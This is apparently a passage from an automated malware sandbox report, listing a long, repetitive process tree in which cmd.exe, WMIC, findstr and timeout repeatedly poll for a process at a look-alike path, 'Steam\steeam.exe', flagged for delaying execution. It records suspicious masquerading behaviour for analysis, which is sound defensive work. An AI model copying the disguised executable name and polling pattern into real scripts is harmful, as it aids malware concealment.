timeout /t 1
6⤵
PID:2476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2632

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:32

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3176

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1384

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4688

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4684

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2392

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4680

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1824

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:352

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4716

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3860

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2240

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:212

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4356

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3856

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2552

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2236

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4052

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4708

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4416

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2292

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5080

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3596

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2912

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:200

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5056

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1460

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:920

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2460

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4900

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2696

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4716

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3324

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4356

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5020

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5108

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3060

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2808

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1076

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4932

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4416

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2292

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:512

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5008

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3596

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2824

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4872

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1048

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3868

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2664

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:204

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1360

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2844

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3228

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:96

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4048

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4136

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4392

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:924

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2276

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:884

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1520

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3428

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3100

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2096

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:660

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2788

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:696

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4224

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4872

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2192

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4900

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5000

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2932

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:664

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4728

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1956

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3896

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2708

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:96

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:776

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:8

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3904

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5080

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1588

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4416

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1820

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2828

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2556

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4584

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4684

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1120

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:4872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4236

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3172

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:920

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2240

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5040

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2264

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4396

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1624

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5100

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2136

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2640

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4876

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2632

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4132

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:776

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1612

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1584

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3368

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3336

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:5024

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2776

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2664

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4448

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4020

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4600

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4404

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3680

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3932

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3328

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1624

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4704

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3812

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4876

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4132

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4372

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3428

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4620

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3704

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2628

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4536

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4672

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4884

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4724

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4236

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2696

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:5036

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:5084

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2384

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3656

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:5108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4264

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1376

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2748

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4572

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4696

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:3932

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4876

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:3904

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4704

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:720

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4124

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4132

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:1120

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4864

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1264

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:1208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:3584

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2312

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1432

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
- Delays execution with timeout.exe
PID:920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4764

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2836

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1712

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:3176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:4920

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:4728

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:2936

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2692

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:96

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4424

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:380

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2660

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:1384

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:2676

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:2232

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:4344

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:2668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
6⤵
PID:720

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
7⤵
PID:1584

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
7⤵
PID:524

C:\Windows\system32\timeout.exe
timeout /t 1
6⤵
PID:4804

